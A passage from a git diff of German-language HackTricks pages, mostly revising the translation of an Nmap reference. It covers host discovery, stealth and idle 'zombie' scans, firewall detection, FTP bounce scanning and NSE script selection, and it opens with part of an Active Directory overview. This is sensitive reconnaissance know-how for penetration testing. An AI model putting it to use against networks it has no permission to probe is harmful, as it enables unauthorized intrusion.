umfassen können. Unterdomänen ermöglichen eine weitere Segmentierung, wobei jede möglicherweise ihren eigenen Server und ihre eigene Benutzerbasis hat. Diese Struktur zentralisiert das Benutzermanagement und gewährt oder beschränkt den Zugriff auf Netzwerkressourcen. Es können Abfragen gestellt werden, um spezifische Informationen wie Kontaktdaten abzurufen oder Ressourcen wie Drucker in der Domäne zu finden. +Active Directory ist eine netzwerkzugängliche Datenbank, die Objekte wie Benutzer, Gruppen, Berechtigungen und Ressourcen enthält und die zentrale Verwaltung von Netzwerkentitäten ermöglicht. AD organisiert seine Daten in einer hierarchischen Struktur von Domänen, die Server, Gruppen und Benutzer umfassen können. Subdomänen ermöglichen eine weitere Segmentierung, wobei jede potenziell ihre eigene Server- und Benutzerbasis hat. Diese Struktur zentralisiert das Benutzermanagement, gewährt oder beschränkt den Zugriff auf Netzwerkressourcen. Abfragen können gestellt werden, um spezifische Informationen wie Kontaktdaten abzurufen oder Ressourcen wie Drucker innerhalb der Domäne zu lokalisieren. +{% hint style="success" %} +Lernen & üben Sie AWS-Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositorys senden.
+{% endhint %} diff --git a/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md b/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md index a49b9cd02..0ed7f029b 100644 --- a/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md +++ b/generic-methodologies-and-resources/pentesting-network/nmap-summary-esp.md @@ -1,18 +1,19 @@ # Nmap Zusammenfassung (ESP) +{% hint style="success" %} +Lernen Sie AWS-Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Erlernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks beworben sehen möchten** oder **HackTricks im PDF-Format herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositorys senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github Repositories einreichen.
+{% endhint %}
@@ -35,42 +36,42 @@ Standardmäßig startet Nmap eine Entdeckungsphase bestehend aus: `-PA80 -PS443 * **`-sL`**: Es ist nicht invasiv, listet die Ziele auf, indem **DNS**-Anfragen gestellt werden, um Namen aufzulösen. Es ist nützlich zu wissen, ob z.B. www.prueba.es/24 alle IPs unsere Ziele sind. * **`-Pn`**: **Kein Ping**. Dies ist nützlich, wenn Sie wissen, dass alle aktiv sind (sonst könnten Sie viel Zeit verlieren, aber diese Option erzeugt auch falsche Negativmeldungen, die besagen, dass sie nicht aktiv sind), es verhindert die Entdeckungsphase. * **`-sn`** : **Kein Portscan**. Nach Abschluss der Aufklärungsphase werden keine Ports gescannt. Es ist relativ unauffällig und ermöglicht einen kleinen Netzwerkscan. Mit Privilegien sendet es ein ACK (-PA) an 80, ein SYN(-PS) an 443 und eine Echo-Anfrage sowie eine Timestamp-Anfrage, ohne Privilegien werden immer vollständige Verbindungen hergestellt. Wenn das Ziel das Netzwerk ist, wird nur ARP(-PR) verwendet. Wenn es mit einer anderen Option verwendet wird, werden nur die Pakete der anderen Option verworfen. -* **`-PR`**: **Ping ARP**. Wird standardmäßig verwendet, wenn Computer in unserem Netzwerk analysiert werden, ist schneller als die Verwendung von Pings. Wenn keine ARP-Pakete verwendet werden sollen, verwenden Sie `--send-ip`. -* **`-PS `**: Sendet SYN-Pakete, auf die bei Antwort mit SYN/ACK geöffnet ist (auf die bei Antwort mit RST, um die Verbindung nicht zu beenden), bei Antwort mit RST geschlossen ist und bei keiner Antwort nicht erreichbar ist. Wenn keine Privilegien vorhanden sind, wird automatisch eine vollständige Verbindung verwendet. Wenn keine Ports angegeben sind, wird es an Port 80 gesendet. +* **`-PR`**: **Ping ARP**. Wird standardmäßig verwendet, wenn Computer in unserem Netzwerk analysiert werden, es ist schneller als die Verwendung von Pings. Wenn Sie keine ARP-Pakete verwenden möchten, verwenden Sie `--send-ip`. +* **`-PS `**: Sendet SYN-Pakete, auf die bei SYN/ACK geantwortet wird, dass es offen ist (auf das mit RST geantwortet wird, um die Verbindung nicht zu beenden), bei RST ist es geschlossen und wenn nicht geantwortet wird, ist es nicht erreichbar. Wenn keine Ports angegeben sind, wird es an Port 80 gesendet. * **`-PA `**: Wie das vorherige, aber mit ACK, die Kombination beider ergibt bessere Ergebnisse. -* **`-PU `**: Das Ziel ist das Gegenteil, sie werden an Ports gesendet, von denen erwartet wird, dass sie geschlossen sind. Einige Firewalls überprüfen nur TCP-Verbindungen. Wenn es geschlossen ist, wird mit Port unreachable geantwortet, wenn mit einem anderen ICMP geantwortet wird oder keine Antwort erfolgt, wird es als Ziel nicht erreichbar belassen. +* **`-PU `**: Das Ziel sind geschlossene Ports. Einige Firewalls überprüfen nur TCP-Verbindungen. Wenn es geschlossen ist, wird mit Port unreachable geantwortet, wenn mit einem anderen ICMP geantwortet wird oder nicht geantwortet wird, wird es als Ziel nicht erreichbar belassen. * **`-PE, -PP, -PM`** : ICMP PINGS: Echo-Antwort, Timestamp und Adressmask. Sie werden gestartet, um festzustellen, ob das Ziel aktiv ist. -* **`-PY`**: Sendet SCTP INIT-Sonden standardmäßig an Port 80, INIT-ACK(geöffnet) oder ABORT(geschlossen) oder nichts oder ICMP nicht erreichbar(inaktiv) kann geantwortet werden. -* **`-PO `**: Ein Protokoll wird in den Headern angegeben, standardmäßig 1(ICMP), 2(IGMP) und 4(Encap IP). Für ICMP, IGMP, TCP (6) und UDP (17) Protokolle werden die Protokollheader gesendet, für den Rest wird nur der IP-Header gesendet. Der Zweck davon ist, dass aufgrund der Fehlbildung der Header Protokoll nicht erreichbar oder Antworten desselben Protokolls beantwortet werden, um zu wissen, ob es aktiv ist. +* **`-PY`**: Sendet SCTP INIT-Sonden standardmäßig an Port 80, INIT-ACK(geöffnet) oder ABORT(geschlossen) oder nichts oder ICMP unreachable(inaktiv) können geantwortet werden. +* **`-PO `**: Ein Protokoll wird in den Headern angegeben, standardmäßig 1(ICMP), 2(IGMP) und 4(Encap IP). Für ICMP, IGMP, TCP (6) und UDP (17) Protokolle werden die Protokollheader gesendet, für den Rest wird nur der IP-Header gesendet. Der Zweck davon ist, dass aufgrund der Fehlbildung der Header Protokoll nicht erreichbar oder Antworten des gleichen Protokolls gesendet werden, um zu wissen, ob es aktiv ist. * **`-n`**: Kein DNS * **`-R`**: Immer DNS ### Portscan-Techniken -* **`-sS`**: Stellt die Verbindung nicht her, hinterlässt also keine Spuren, sehr gut, wenn es verwendet werden kann (Privilegien). Es ist das standardmäßig verwendete. -* **`-sT`**: Stellt die Verbindung her, hinterlässt also Spuren, kann aber sicher verwendet werden. Standardmäßig ohne Privilegien. -* **`-sU`**: Langsamer, für UDP. Hauptsächlich: DNS(53), SNMP(161,162), DHCP(67 und 68), (-sU53,161,162,67,68): geöffnet(antwortet), geschlossen(Port nicht erreichbar), gefiltert (ein anderes ICMP), geöffnet/gefiltert (nichts). Bei geöffnet/gefiltert sendet -sV zahlreiche Anfragen, um eine der Versionen zu erkennen, die nmap unterstützt, und den wahren Zustand erkennen zu können. Es erhöht die Zeit erheblich. -* **`-sY`**: SCTP-Protokoll kann die Verbindung nicht herstellen, daher gibt es keine Logs, funktioniert wie -PY -* **`-sN,-sX,-sF`:** Null, Fin, Xmas, sie können einige Firewalls durchdringen und Informationen extrahieren. Sie basieren darauf, dass standardkonforme Maschinen auf alle Anfragen mit RST antworten sollten, die keine SYN-, RST- oder ACK-Flags erhöht haben: geöffnet/gefiltert(nichts), geschlossen(RST), gefiltert (ICMP nicht erreichbar). Unzuverlässig bei Windows, CIsco, BSDI und OS/400. Bei Unix ja. -* **`-sM`**: Maimon-Scan: Sendet FIN- und ACK-Flags, verwendet für BSD, gibt derzeit alle als geschlossen zurück. -* **`-sA, sW`**: ACK und Window, wird verwendet, um Firewalls zu erkennen, um zu wissen, ob die Ports gefiltert sind oder nicht. Der -sW unterscheidet zwischen geöffnet/geschlossen, da die geöffneten mit einem anderen Fensterwert antworten: geöffnet (RST mit Fenster ungleich 0), geschlossen (RST-Fenster = 0), gefiltert (ICMP nicht erreichbar oder nichts). Nicht alle Computer arbeiten auf diese Weise, daher, wenn alle geschlossen sind, funktioniert es nicht, wenn einige geöffnet sind, funktioniert es gut, und wenn viele geöffnet und wenige geschlossen sind, funktioniert es andersherum. -* **`-sI`:** Idle-Scan. Für Fälle, in denen eine aktive Firewall vorhanden ist, wir jedoch wissen, dass sie den Zugriff auf eine bestimmte IP nicht filtert (oder wenn wir einfach anonym bleiben möchten), können wir den Zombie-Scanner verwenden (funktioniert für alle Ports), um mögliche Zombies zu finden, können wir das Skript ipidseq oder den Exploit auxiliary/scanner/ip/ipidseq verwenden. Dieser Scanner basiert auf der IPID-Nummer der IP-Pakete. +* **`-sS`**: Stellt keine Verbindung her, hinterlässt also keine Spuren, sehr gut, wenn es verwendet werden kann (Privilegien). Es ist das standardmäßig verwendete. +* **`-sT`**: Stellt die Verbindung her, hinterlässt also eine Spur, kann aber sicher verwendet werden. Standardmäßig ohne Privilegien. +* **`-sU`**: Langsamer, für UDP. Hauptsächlich: DNS(53), SNMP(161,162), DHCP(67 und 68), (-sU53,161,162,67,68): geöffnet(antwortet), geschlossen(Port nicht erreichbar), gefiltert (ein anderes ICMP), geöffnet/gefiltert (nichts). Bei geöffnet/gefiltert sendet -sV zahlreiche Anfragen, um eine der Versionen zu erkennen, die nmap unterstützt, und den tatsächlichen Zustand zu erkennen. Es erhöht die Zeit erheblich. +* **`-sY`**: SCTP-Protokoll kann keine Verbindung herstellen, daher gibt es keine Logs, funktioniert wie -PY +* **`-sN,-sX,-sF`:** Null, Fin, Xmas, sie können einige Firewalls durchdringen und Informationen extrahieren. Sie basieren darauf, dass standardkonforme Maschinen auf alle Anfragen mit RST antworten sollten, die keine SYN, RST oder ACK-Flags aufweisen: geöffnet/gefiltert(nichts), geschlossen(RST), gefiltert (ICMP nicht erreichbar). Unzuverlässig bei Windows, CIsco, BSDI und OS/400. Auf Unix ja. +* **`-sM`**: Maimon-Scan: Sendet FIN- und ACK-Flags, wird für BSD verwendet, derzeit werden alle als geschlossen zurückgegeben. +* **`-sA, sW`**: ACK und Window, wird verwendet, um Firewalls zu erkennen, um festzustellen, ob die Ports gefiltert sind oder nicht. Der -sW unterscheidet zwischen geöffnet/geschlossen, da die geöffneten mit einem anderen Fensterwert antworten: geöffnet (RST mit Fenster ungleich 0), geschlossen (RST-Fenster = 0), gefiltert (ICMP nicht erreichbar oder nichts). Nicht alle Computer arbeiten auf diese Weise, daher, wenn alles geschlossen ist, funktioniert es nicht, wenn einige geöffnet sind, funktioniert es gut, und wenn viele geöffnet und wenige geschlossen sind, funktioniert es andersherum. +* **`-sI`:** Idle-Scan. Für Fälle, in denen eine aktive Firewall vorhanden ist, aber wir wissen, dass sie den Verkehr zu einer bestimmten IP nicht filtert (oder wenn wir einfach anonym bleiben wollen), können wir den Zombie-Scanner verwenden (er funktioniert für alle Ports), um mögliche Zombies zu finden, können wir das Skript ipidseq oder den Exploit auxiliary/scanner/ip/ipidseq verwenden. Dieser Scanner basiert auf der IPID-Nummer der IP-Pakete. * **`--badsum`:** Es sendet die Summe falsch, die Computer würden die Pakete verwerfen, aber die Firewalls könnten etwas antworten, es wird verwendet, um Firewalls zu erkennen. -* **`-sZ`:** "Seltsamer" SCTP-Scanner, beim Senden von Sonden mit Cookie-Echo-Fragmenten sollten sie abgewiesen werden, wenn sie geöffnet sind, oder mit ABORT beantwortet werden, wenn sie geschlossen sind. Es kann Firewalls passieren, die init nicht passieren, das Schlechte daran ist, dass es nicht zwischen gefiltert und geöffnet unterscheidet. -* **`-sO`:** Protokoll-IP-Scan. Sendet falsche und leere Header, in denen manchmal nicht einmal das Protokoll unterschieden werden kann. Wenn ein ICMP nicht erreichbares Protokoll ankommt, ist es geschlossen, wenn ein nicht erreichbarer Port ankommt, ist es geöffnet, wenn ein anderer Fehler ankommt, ist es gefiltert, wenn nichts ankommt, ist es geöffnet|gefiltert. -* **`-b `:** FTPhost--> Wird verwendet, um einen Host von einem anderen aus zu scannen, dies geschieht durch Verbindung mit dem FTP eines anderen Rechners und Aufforderung zum Senden von Dateien an die Ports, die Sie von einem anderen Rechner aus scannen möchten, anhand der Antworten wissen wir, ob sie geöffnet sind oder nicht. \[\:\@]\\[:\] Fast alle FTP-Server erlauben dies nicht mehr, daher ist es praktisch kaum noch von Nutzen. +* **`-sZ`:** "Seltsamer" SCTP-Scanner, beim Senden von Sonden mit Cookie-Echo-Fragmenten sollten sie fallen gelassen werden, wenn sie geöffnet sind, oder mit ABORT beantwortet werden, wenn sie geschlossen sind. Er kann Firewalls passieren, die init nicht passieren, das Schlechte daran ist, dass er nicht zwischen gefiltert und geöffnet unterscheidet. +* **`-sO`:** Protokoll-IP-Scan. Sendet falsche und leere Header, in denen manchmal nicht einmal das Protokoll unterschieden werden kann. Wenn ein ICMP unreachable-Protokoll ankommt, ist es geschlossen, wenn ein unerreichbarer Port ankommt, ist es geöffnet, wenn ein anderer Fehler ankommt, ist es gefiltert, wenn nichts ankommt, ist es geöffnet|gefiltert. +* **`-b `:** FTPhost--> Wird verwendet, um einen Host von einem anderen aus zu scannen, dies geschieht, indem man sich mit dem FTP einer anderen Maschine verbindet und sie bittet, Dateien an die Ports zu senden, die Sie von einer anderen Maschine aus scannen möchten, je nach Antworten werden wir wissen, ob sie geöffnet sind oder nicht. \[\:\@]\\[:\] Fast alle FTP-Server erlauben dies nicht mehr und daher ist es von geringem praktischen Nutzen. ### **Zentrale Analyse** -**-p:** Wird verwendet, um die zu scannenden Ports anzugeben. Um alle 65335 auszuwählen: **-p-** oder **-p all**. Nmap hat eine interne Klassifizierung nach Popularität. Standardmäßig werden die Top 100 verwendet. Mit **-F** (schneller Scan) werden die Top 100 analysiert. Mit **--top-ports \** werden diese Anzahl von Top-Ports analysiert (von 1 bis 65335). Es überprüft die Ports in zufälliger Reihenfolge, um dies zu vermeiden **-r**. Sie können auch Ports auswählen: 20-30,80,443,1024- Dies bedeutet, dass es ab 1024 weiter sucht. Sie können auch Ports nach Protokollen gruppieren: U:53,T:21-25,80,139,S:9. Sie können auch einen Bereich innerhalb der beliebten Nmap-Ports auswählen: -p \[-1024] analysiert bis 1024 der in nmap-services enthaltenen Ports. **--port-ratio \** Analysiert die häufigsten Ports mit einem Verhältnis zwischen 0 und 1 +**-p:** Wird verwendet, um die zu scannenden Ports anzugeben. Um alle 65335 auszuwählen: **-p-** oder **-p all**. Nmap hat eine interne Klassifizierung nach Popularität. Standardmäßig werden die Top 1000 verwendet. Mit **-F** (schneller Scan) werden die Top 100 analysiert. Mit **--top-ports \** werden diese Anzahl von Top-Ports analysiert (von 1 bis 65335). Es überprüft die Ports in zufälliger Reihenfolge, um dies zu vermeiden **-r**. Sie können auch Ports auswählen: 20-30,80,443,1024- Dies bedeutet, dass es ab 1024 weiter sucht. Sie können auch Ports nach Protokollen gruppieren: U:53,T:21-25,80,139,S:9. Sie können auch einen Bereich innerhalb der beliebten Nmap-Ports auswählen: -p \[-1024] analysiert bis 1024 der in nmap-services enthaltenen Ports. **--port-ratio \** Analysiert die häufigsten Ports mit einem Verhältnis zwischen 0 und 1. **-sV** Versions-Scan, die Intensität kann von 0 bis 9 eingestellt werden, standardmäßig 7. -**--version-intensity \** Regelt die Intensität, so dass bei niedrigeren Werten nur die wahrscheinlichsten Sonden gesendet werden, aber nicht alle. Dadurch kann die Scanzeit erheblich verkürzt werden, insbesondere bei UDP-Scans. +**--version-intensity \** Wir regulieren die Intensität, so dass bei niedrigeren Werten nur die wahrscheinlichsten Sonden gesendet werden, aber nicht alle. Dadurch können wir die Scanzeit erheblich verkürzen, insbesondere bei UDP. **-O** OS-Erkennung -**--osscan-limit** Um einen Host ordnungsgemäß zu scannen, muss mindestens ein Port geöffnet und ein anderer geschlossen sein. Wenn diese Bedingung nicht erfüllt ist und wir dies festgelegt haben, versucht es keine OS-Vorhersage zu treffen (spart Zeit) +**--osscan-limit** Um einen Host richtig zu scannen, muss mindestens ein Port geöffnet und ein anderer geschlossen sein, wenn diese Bedingung nicht erfüllt ist und wir dies eingestellt haben, versucht es keine OS-Vorhersage zu treffen (spart Zeit) **--osscan-guess** Wenn die Betriebssystemerkennung nicht perfekt ist, wird dadurch mehr Aufwand betrieben. **Skripte** @@ -83,10 +84,10 @@ Die verfügbaren Typen sind: auth, broadcast, default, discovery, dos, exploit, * **Auth:** führt alle verfügbaren Authentifizierungsskripte aus * **Default:** führt die Standard-Skripte des Tools aus -* **Discovery:** ruft Informationen vom Ziel oder Opfer ab +* **Discovery:** ruft Informationen über das Ziel oder Opfer ab * **External:** Skript zur Verwendung externer Ressourcen * **Intrusive:** verwendet als aufdringlich betrachtete Skripte für das Opfer oder Ziel -* **Malware:** überprüft, ob offene Verbindungen durch bösartigen Code oder Hintertüren vorhanden sind +* **Malware:** überprüft auf offene Verbindungen durch schädlichen Code oder Hintertüren * **Safe:** führt nicht aufdringliche Skripte aus * **Vuln:** entdeckt die bekanntesten Schwachstellen * **All:** führt alle verfügbaren NSE-Skripte aus @@ -97,9 +98,9 @@ Zum Suchen von Skripten: **nmap --script-help="not intrusive" -> Alle außer diesen** -**nmap --script-help="default or safe" -> Diejenigen, die in einem oder in beiden vorhanden sind** +**nmap --script-help="default or safe" -> Diejenigen, die in einem oder in beiden enthalten sind** -**nmap --script-help="default and safe" --> Diejenigen, die in beiden vorhanden sind** +**nmap --script-help="default and safe" --> Diejenigen, die in beiden enthalten sind** **nmap --script-help="(default or safe or intrusive) and not http-\*"** @@ -113,7 +114,7 @@ Zum Suchen von Skripten: \--script-updatedb -**Um ein Skript zu verwenden, geben Sie einfach ein: nmap --script Skriptname Ziel** --> Durch Eingabe des Skripts wird sowohl das Skript als auch der Scanner ausgeführt. Daher können auch Scanneroptionen hinzugefügt werden. Wir können **"safe=1"** hinzufügen, um nur sichere Skripte auszuführen. +**Um ein Skript zu verwenden, geben Sie einfach ein: nmap --script Skriptname Ziel** --> Durch Eingabe des Skripts wird sowohl das Skript als auch der Scanner ausgeführt. Daher können auch Scanneroptionen hinzugefügt werden. Fügen Sie **"safe=1"** hinzu, um nur sichere Skripte auszuführen. **Zeitsteuerung** @@ -123,7 +124,7 @@ Nmap teilt die Gesamtzahl der zu scannenden Hosts in Gruppen auf und analysiert Es kann geändert werden mit\*\*--min-hostgroup\*\* _**\**_**;** **--max-hostgroup** _**\**_ (Anpassung der Größen paralleler Scan-Gruppen) -Die Anzahl der parallelen Scanner kann gesteuert werden, aber es ist besser, dies nicht zu tun (Nmap hat bereits eine automatische Steuerung basierend auf dem Netzwerkstatus implementiert): **--min-parallelism** _**\**_**;** **--max-parallelism** _**\**_ +Die Anzahl der parallelen Scanner kann gesteuert werden, aber es ist besser, dies nicht zu tun (Nmap hat bereits eine automatische Steuerung basierend auf dem Netzwerkzustand): **--min-parallelism** _**\**_**;** **--max-parallelism** _**\**_ Die rtt-Timeout-Zeit kann geändert werden, ist jedoch normalerweise nicht erforderlich: **--min-rtt-timeout** _**\